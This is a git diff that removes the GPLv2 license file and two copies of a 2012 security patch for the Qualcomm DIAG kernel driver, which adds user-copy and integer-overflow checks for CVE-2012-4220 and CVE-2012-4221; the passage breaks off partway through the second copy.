diff --git a/Patches/Linux_CVEs/COPYING b/Patches/Linux_CVEs/COPYING
deleted file mode 100644
index ca442d31..00000000
--- a/Patches/Linux_CVEs/COPYING
+++ /dev/null
@@ -1,356 +0,0 @@
-
-   NOTE! This copyright does *not* cover user programs that use kernel
- services by normal system calls - this is merely considered normal use
- of the kernel, and does *not* fall under the heading of "derived work".
- Also note that the GPL below is copyrighted by the Free Software
- Foundation, but the instance of code that it refers to (the Linux
- kernel) is copyrighted by me and others who actually wrote it.
-
- Also note that the only valid version of the GPL as far as the kernel
- is concerned is _this_ particular version of the license (ie v2, not
- v2.2 or v3.x or whatever), unless explicitly otherwise stated.
-
-			Linus Torvalds
-
-----------------------------------------
-
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
diff --git a/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch
deleted file mode 100644
index 1965644b..00000000
--- a/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch
+++ /dev/null
@@ -1,345 +0,0 @@
-From 77ad483f7b82d944aae5b944cd28e923a5293668 Mon Sep 17 00:00:00 2001
-From: Ravi Aravamudhan <aravamud@codeaurora.org>
-Date: Thu, 15 Nov 2012 16:04:04 -0800
-Subject: diag: Improve handling of IOCTLs
-
-DIAG kernel driver interacts with user space processes using
-IOCTLS. This change adds conditions to avoid potential integer
-over/underflow, incorrect buffer copy.
-
-CVE-2012-4220
-CVE-2012-4221
-
-Change-Id: Ic1e815051ae9544c911c9a5bd0c9218c1225f6d5
-CRs-Fixed: 385352
-CRs-Fixed: 385349
-Signed-off-by: Shalabh Jain <shalabhj@codeaurora.org>
----
- drivers/char/diag/diagchar.h      |   1 +
- drivers/char/diag/diagchar_core.c | 188 ++++++++++++++++++++++++++++----------
- 2 files changed, 142 insertions(+), 47 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index 28d0565..de3cf522 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -29,6 +29,7 @@
- #define IN_BUF_SIZE		16384
- #define MAX_IN_BUF_SIZE	32768
- #define MAX_SYNC_OBJ_NAME_SIZE	32
-+#define UINT32_MAX	UINT_MAX
- /* Size of the buffer used for deframing a packet
-   reveived from the PC tool*/
- #define HDLC_MAX 4096
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 19c6ed2..7b17ce4 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -358,7 +358,7 @@ void diag_clear_reg(int proc_num)
- }
- 
- void diag_add_reg(int j, struct bindpkt_params *params,
--					  int *success, int *count_entries)
-+				  int *success, unsigned int *count_entries)
- {
- 	*success = 1;
- 	driver->table[j].cmd_code = params->cmd_code;
-@@ -399,79 +399,153 @@ inline uint16_t diag_get_remote_device_mask(void) { return 0; }
- long diagchar_ioctl(struct file *filp,
- 			   unsigned int iocmd, unsigned long ioarg)
- {
--	int i, j, count_entries = 0, temp;
--	int success = -1;
-+	int i, j, temp, success = -1, status;
-+	unsigned int count_entries = 0, interim_count = 0;
- 	void *temp_buf;
- 	uint16_t support_list = 0;
--	struct diag_dci_client_tbl *params =
--		kzalloc(sizeof(struct diag_dci_client_tbl), GFP_KERNEL);
-+	struct diag_dci_client_tbl *dci_params;
- 	struct diag_dci_health_stats stats;
--	int status;
- 
- 	if (iocmd == DIAG_IOCTL_COMMAND_REG) {
--		struct bindpkt_params_per_process *pkt_params =
--			 (struct bindpkt_params_per_process *) ioarg;
-+		struct bindpkt_params_per_process pkt_params;
-+		struct bindpkt_params *params;
-+		struct bindpkt_params *head_params;
-+		if (copy_from_user(&pkt_params, (void *)ioarg,
-+			   sizeof(struct bindpkt_params_per_process))) {
-+			return -EFAULT;
-+		}
-+		if ((UINT32_MAX/sizeof(struct bindpkt_params)) <
-+							 pkt_params.count) {
-+			pr_warning("diag: integer overflow while multiply\n");
-+			return -EFAULT;
-+		}
-+		params = kzalloc(pkt_params.count*sizeof(
-+			struct bindpkt_params), GFP_KERNEL);
-+		if (!params) {
-+			pr_err("diag: unable to alloc memory\n");
-+			return -ENOMEM;
-+		} else
-+			head_params = params;
-+
-+		if (copy_from_user(params, pkt_params.params,
-+			   pkt_params.count*sizeof(struct bindpkt_params))) {
-+			kfree(head_params);
-+			return -EFAULT;
-+		}
- 		mutex_lock(&driver->diagchar_mutex);
- 		for (i = 0; i < diag_max_reg; i++) {
- 			if (driver->table[i].process_id == 0) {
--				diag_add_reg(i, pkt_params->params,
--						&success, &count_entries);
--				if (pkt_params->count > count_entries) {
--					pkt_params->params++;
-+				diag_add_reg(i, params, &success,
-+							 &count_entries);
-+				if (pkt_params.count > count_entries) {
-+					params++;
- 				} else {
- 					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
- 					return success;
- 				}
- 			}
- 		}
- 		if (i < diag_threshold_reg) {
- 			/* Increase table size by amount required */
--			diag_max_reg += pkt_params->count -
-+			if (pkt_params.count >= count_entries) {
-+				interim_count = pkt_params.count -
- 							 count_entries;
-+			} else {
-+				pr_warning("diag: error in params count\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
-+			if (UINT32_MAX - diag_max_reg >=
-+							interim_count) {
-+				diag_max_reg += interim_count;
-+			} else {
-+				pr_warning("diag: Integer overflow\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
- 			/* Make sure size doesnt go beyond threshold */
- 			if (diag_max_reg > diag_threshold_reg) {
- 				diag_max_reg = diag_threshold_reg;
- 				pr_info("diag: best case memory allocation\n");
- 			}
-+			if (UINT32_MAX/sizeof(struct diag_master_table) <
-+								 diag_max_reg) {
-+				pr_warning("diag: integer overflow\n");
-+				kfree(head_params);
-+				mutex_unlock(&driver->diagchar_mutex);
-+				return -EFAULT;
-+			}
- 			temp_buf = krealloc(driver->table,
- 					 diag_max_reg*sizeof(struct
- 					 diag_master_table), GFP_KERNEL);
- 			if (!temp_buf) {
--				diag_max_reg -= pkt_params->count -
--							 count_entries;
--				pr_alert("diag: Insufficient memory for reg.");
-+				pr_alert("diag: Insufficient memory for reg.\n");
- 				mutex_unlock(&driver->diagchar_mutex);
-+
-+				if (pkt_params.count >= count_entries) {
-+					interim_count = pkt_params.count -
-+								 count_entries;
-+				} else {
-+					pr_warning("diag: params count error\n");
-+					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
-+					return -EFAULT;
-+				}
-+				if (diag_max_reg >= interim_count) {
-+					diag_max_reg -= interim_count;
-+				} else {
-+					pr_warning("diag: Integer underflow\n");
-+					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
-+					return -EFAULT;
-+				}
-+				kfree(head_params);
- 				return 0;
- 			} else {
- 				driver->table = temp_buf;
- 			}
- 			for (j = i; j < diag_max_reg; j++) {
--				diag_add_reg(j, pkt_params->params,
--						&success, &count_entries);
--				if (pkt_params->count > count_entries) {
--					pkt_params->params++;
-+				diag_add_reg(j, params, &success,
-+							 &count_entries);
-+				if (pkt_params.count > count_entries) {
-+					params++;
- 				} else {
- 					mutex_unlock(&driver->diagchar_mutex);
-+					kfree(head_params);
- 					return success;
- 				}
- 			}
-+			kfree(head_params);
- 			mutex_unlock(&driver->diagchar_mutex);
- 		} else {
- 			mutex_unlock(&driver->diagchar_mutex);
-+			kfree(head_params);
- 			pr_err("Max size reached, Pkt Registration failed for"
- 						" Process %d", current->tgid);
- 		}
- 		success = 0;
- 	} else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) {
--		struct diagpkt_delay_params *delay_params =
--					(struct diagpkt_delay_params *) ioarg;
--
--		if ((delay_params->rsp_ptr) &&
--		 (delay_params->size == sizeof(delayed_rsp_id)) &&
--				 (delay_params->num_bytes_ptr)) {
--			*((uint16_t *)delay_params->rsp_ptr) =
--				DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
--			*(delay_params->num_bytes_ptr) = sizeof(delayed_rsp_id);
-+		struct diagpkt_delay_params delay_params;
-+		uint16_t interim_rsp_id;
-+		int interim_size;
-+		if (copy_from_user(&delay_params, (void *)ioarg,
-+					   sizeof(struct diagpkt_delay_params)))
-+			return -EFAULT;
-+		if ((delay_params.rsp_ptr) &&
-+		 (delay_params.size == sizeof(delayed_rsp_id)) &&
-+				 (delay_params.num_bytes_ptr)) {
-+			interim_rsp_id = DIAGPKT_NEXT_DELAYED_RSP_ID(
-+							delayed_rsp_id);
-+			if (copy_to_user((void *)delay_params.rsp_ptr,
-+					 &interim_rsp_id, sizeof(uint16_t)))
-+				return -EFAULT;
-+			interim_size = sizeof(delayed_rsp_id);
-+			if (copy_to_user((void *)delay_params.num_bytes_ptr,
-+						 &interim_size, sizeof(int)))
-+				return -EFAULT;
- 			success = 0;
- 		}
- 	} else if (iocmd == DIAG_IOCTL_DCI_REG) {
-@@ -479,7 +553,13 @@ long diagchar_ioctl(struct file *filp,
- 			return DIAG_DCI_NO_REG;
- 		if (driver->num_dci_client >= MAX_DCI_CLIENTS)
- 			return DIAG_DCI_NO_REG;
--		if (copy_from_user(params, (void *)ioarg,
-+		dci_params = kzalloc(sizeof(struct diag_dci_client_tbl),
-+								 GFP_KERNEL);
-+		if (dci_params == NULL) {
-+			pr_err("diag: unable to alloc memory\n");
-+			return -ENOMEM;
-+		}
-+		if (copy_from_user(dci_params, (void *)ioarg,
- 				 sizeof(struct diag_dci_client_tbl)))
- 			return -EFAULT;
- 		mutex_lock(&driver->dci_mutex);
-@@ -492,9 +572,9 @@ long diagchar_ioctl(struct file *filp,
- 			if (driver->dci_client_tbl[i].client == NULL) {
- 				driver->dci_client_tbl[i].client = current;
- 				driver->dci_client_tbl[i].list =
--							 params->list;
-+							 dci_params->list;
- 				driver->dci_client_tbl[i].signal_type =
--					 params->signal_type;
-+					 dci_params->signal_type;
- 				create_dci_log_mask_tbl(driver->
- 					dci_client_tbl[i].dci_log_mask);
- 				create_dci_event_mask_tbl(driver->
-@@ -512,6 +592,7 @@ long diagchar_ioctl(struct file *filp,
- 			}
- 		}
- 		mutex_unlock(&driver->dci_mutex);
-+		kfree(dci_params);
- 		return driver->dci_client_id;
- 	} else if (iocmd == DIAG_IOCTL_DCI_DEINIT) {
- 		success = -1;
-@@ -536,25 +617,29 @@ long diagchar_ioctl(struct file *filp,
- 	} else if (iocmd == DIAG_IOCTL_DCI_SUPPORT) {
- 		if (driver->ch_dci)
- 			support_list = support_list | DIAG_CON_MPSS;
--		*(uint16_t *)ioarg = support_list;
-+		if (copy_to_user((void *)ioarg, &support_list,
-+							 sizeof(uint16_t)))
-+			return -EFAULT;
- 		return DIAG_DCI_NO_ERROR;
- 	} else if (iocmd == DIAG_IOCTL_DCI_HEALTH_STATS) {
- 		if (copy_from_user(&stats, (void *)ioarg,
- 				 sizeof(struct diag_dci_health_stats)))
- 			return -EFAULT;
- 		for (i = 0; i < MAX_DCI_CLIENTS; i++) {
--			params = &(driver->dci_client_tbl[i]);
--			if (params->client &&
--				params->client->tgid == current->tgid) {
--				stats.dropped_logs = params->dropped_logs;
--				stats.dropped_events = params->dropped_events;
--				stats.received_logs = params->received_logs;
--				stats.received_events = params->received_events;
-+			dci_params = &(driver->dci_client_tbl[i]);
-+			if (dci_params->client &&
-+				dci_params->client->tgid == current->tgid) {
-+				stats.dropped_logs = dci_params->dropped_logs;
-+				stats.dropped_events =
-+						 dci_params->dropped_events;
-+				stats.received_logs = dci_params->received_logs;
-+				stats.received_events =
-+						 dci_params->received_events;
- 				if (stats.reset_status) {
--					params->dropped_logs = 0;
--					params->dropped_events = 0;
--					params->received_logs = 0;
--					params->received_events = 0;
-+					dci_params->dropped_logs = 0;
-+					dci_params->dropped_events = 0;
-+					dci_params->received_logs = 0;
-+					dci_params->received_events = 0;
- 				}
- 				break;
- 			}
-@@ -567,7 +652,7 @@ long diagchar_ioctl(struct file *filp,
- 		for (i = 0; i < driver->num_clients; i++)
- 			if (driver->client_map[i].pid == current->tgid)
- 				break;
--		if (i == -1)
-+		if (i == driver->num_clients)
- 			return -EINVAL;
- 		driver->data_ready[i] |= DEINIT_TYPE;
- 		wake_up_interruptible(&driver->wait_q);
-@@ -1068,7 +1153,7 @@ static int diagchar_write(struct file *file, const char __user *buf,
- 	struct diag_send_desc_type send = { NULL, NULL, DIAG_STATE_START, 0 };
- 	struct diag_hdlc_dest_type enc = { NULL, NULL, 0 };
- 	void *buf_copy = NULL;
--	int payload_size;
-+	unsigned int payload_size;
- #ifdef CONFIG_DIAG_OVER_USB
- 	if (((driver->logging_mode == USB_MODE) && (!driver->usb_connected)) ||
- 				(driver->logging_mode == NO_LOGGING_MODE)) {
-@@ -1079,8 +1164,17 @@ static int diagchar_write(struct file *file, const char __user *buf,
- 	/* Get the packet type F3/log/event/Pkt response */
- 	err = copy_from_user((&pkt_type), buf, 4);
- 	/* First 4 bytes indicate the type of payload - ignore these */
-+	if (count < 4) {
-+		pr_err("diag: Client sending short data\n");
-+		return -EBADMSG;
-+	}
- 	payload_size = count - 4;
--
-+	if (payload_size > USER_SPACE_DATA) {
-+		pr_err("diag: Dropping packet, packet payload size crosses 8KB limit. Current payload size %d\n",
-+				payload_size);
-+		driver->dropped_count++;
-+		return -EBADMSG;
-+	}
- 	if (pkt_type == DCI_DATA_TYPE) {
- 		err = copy_from_user(driver->user_space_data, buf + 4,
- 							 payload_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch
deleted file mode 100644
index 1965644b..00000000
--- a/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch
+++ /dev/null
@@ -1,345 +0,0 @@
-From 77ad483f7b82d944aae5b944cd28e923a5293668 Mon Sep 17 00:00:00 2001
-From: Ravi Aravamudhan <aravamud@codeaurora.org>
-Date: Thu, 15 Nov 2012 16:04:04 -0800
-Subject: diag: Improve handling of IOCTLs
-
-DIAG kernel driver interacts with user space processes using
-IOCTLS. This change adds conditions to avoid potential integer
-over/underflow, incorrect buffer copy.
-
-CVE-2012-4220
-CVE-2012-4221
-
-Change-Id: Ic1e815051ae9544c911c9a5bd0c9218c1225f6d5
-CRs-Fixed: 385352
-CRs-Fixed: 385349
-Signed-off-by: Shalabh Jain <shalabhj@codeaurora.org>
----
- drivers/char/diag/diagchar.h      |   1 +
- drivers/char/diag/diagchar_core.c | 188 ++++++++++++++++++++++++++++----------
- 2 files changed, 142 insertions(+), 47 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index 28d0565..de3cf522 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -29,6 +29,7 @@
- #define IN_BUF_SIZE		16384
- #define MAX_IN_BUF_SIZE	32768
- #define MAX_SYNC_OBJ_NAME_SIZE	32
-+#define UINT32_MAX	UINT_MAX
- /* Size of the buffer used for deframing a packet
-   reveived from the PC tool*/
- #define HDLC_MAX 4096
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 19c6ed2..7b17ce4 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -358,7 +358,7 @@ void diag_clear_reg(int proc_num)
- }
- 
- void diag_add_reg(int j, struct bindpkt_params *params,
--					  int *success, int *count_entries)
-+				  int *success, unsigned int *count_entries)
- {
- 	*success = 1;
- 	driver->table[j].cmd_code = params->cmd_code;
-@@ -399,79 +399,153 @@ inline uint16_t diag_get_remote_device_mask(void) { return 0; }
- long diagchar_ioctl(struct file *filp,
- 			   unsigned int iocmd, unsigned long ioarg)
- {
--	int i, j, count_entries = 0, temp;
--	int success = -1;
-+	int i, j, temp, success = -1, status;
-+	unsigned int count_entries = 0, interim_count = 0;
- 	void *temp_buf;
- 	uint16_t support_list = 0;
--	struct diag_dci_client_tbl *params =
--		kzalloc(sizeof(struct diag_dci_client_tbl), GFP_KERNEL);
-+	struct diag_dci_client_tbl *dci_params;
- 	struct diag_dci_health_stats stats;
--	int status;
- 
- 	if (iocmd == DIAG_IOCTL_COMMAND_REG) {
--		struct bindpkt_params_per_process *pkt_params =
--			 (struct bindpkt_params_per_process *) ioarg;
-+		struct bindpkt_params_per_process pkt_params;
-+		struct bindpkt_params *params;
-+		struct bindpkt_params *head_params;
-+		if (copy_from_user(&pkt_params, (void *)ioarg,
-+			   sizeof(struct bindpkt_params_per_process))) {
-+			return -EFAULT;
-+		}
-+		if ((UINT32_MAX/sizeof(struct bindpkt_params)) <
-+							 pkt_params.count) {
-+			pr_warning("diag: integer overflow while multiply\n");
-+			return -EFAULT;
-+		}
-+		params = kzalloc(pkt_params.count*sizeof(
-+			struct bindpkt_params), GFP_KERNEL);
-+		if (!params) {
-+			pr_err("diag: unable to alloc memory\n");
-+			return -ENOMEM;
-+		} else
-+			head_params = params;
-+
-+		if (copy_from_user(params, pkt_params.params,
-+			   pkt_params.count*sizeof(struct bindpkt_params))) {
-+			kfree(head_params);
-+			return -EFAULT;
-+		}
- 		mutex_lock(&driver->diagchar_mutex);
- 		for (i = 0; i < diag_max_reg; i++) {
- 			if (driver->table[i].process_id == 0) {
